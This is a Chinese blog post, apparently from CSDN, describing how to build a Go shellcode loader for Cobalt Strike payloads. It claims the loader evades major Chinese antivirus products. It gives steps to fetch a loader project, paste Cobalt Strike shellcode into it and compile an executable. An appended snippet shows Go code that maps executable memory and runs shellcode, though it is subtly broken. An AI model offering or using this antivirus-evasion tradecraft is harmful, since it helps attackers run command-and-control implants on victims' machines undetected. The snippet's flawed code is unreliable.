免杀方法(五)golang加载器cobaltstrike shellcode

一.简介

Go语言目前是最火的编程语言之一,使用go语言编写的加载器,运行shellcode
可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、
电脑管家。免杀效果很好。而且操作免杀的步骤简单。
项目地址https:/github.com/jax777/shellcode-launch
Go语言编译器下载https:/studygolang.com/dl

Downloads - The Go Programming Language

二.步骤

安装go,下载安装包,傻瓜安装即可。

解压下载的项目压缩包,新建64.bat文件,复制如下代码,去掉空格保存

 

这里选择Cobalt strike选择c代码shellcode

把shellcode 复制到sc变量的字符串中

把文件夹shellcode-launch移到go目录下的src目录,然后执行64.bat。

最后生成exe文件

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
在 Go 语言中,如果您想要编写 shellcode,可以使用 asm 包。asm 包提供了一种用汇编语言编写代码的方法,以便在 Go 语言中使用汇编语言。 首先,您需要安装 Go 语言的汇编工具集,以便在编写汇编代码时能够编译和链接代码。您可以使用以下命令安装汇编工具集: ``` sudo apt-get install golang-go.tools ``` 然后,您可以在 Go 语言中使用 asm 包来编写汇编代码。下面是一个简单的例子: ```go package main import ( "syscall" "unsafe" ) func main() { shellcode := []byte{ /* your shellcode goes here */ } // Allocate memory for the shellcode addr, _, err := syscall.Syscall(syscall.SYS_MMAP, 0, uintptr(len(shellcode)), syscall.PROT_READ|syscall.PROT_WRITE|syscall.PROT_EXEC, syscall.MAP_ANONYMOUS|syscall.MAP_PRIVATE, 0, 0) if err != 0 { panic(err) } buf := (*[1 << 30]byte)(unsafe.Pointer(addr)) copy(buf[:], shellcode) // Call the shellcode syscall.Syscall(addr, 0, 0, 0, 0) } ``` 在上面的示例中,我们首先定义了一个 shellcode 变量,其中包含要执行的汇编代码。然后,我们使用 syscall 包中的 Syscall 函数来分配内存,并将 shellcode 复制到分配的内存中。最后,我们使用 Syscall 函数来执行 shellcode。 请注意,上述示例代码仅用于演示如何在 Go 语言中使用汇编语言编写 shellcode。在实际使用中,编写 shellcode 需要考虑许多其他因素,如平台兼容性、安全性、调试等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值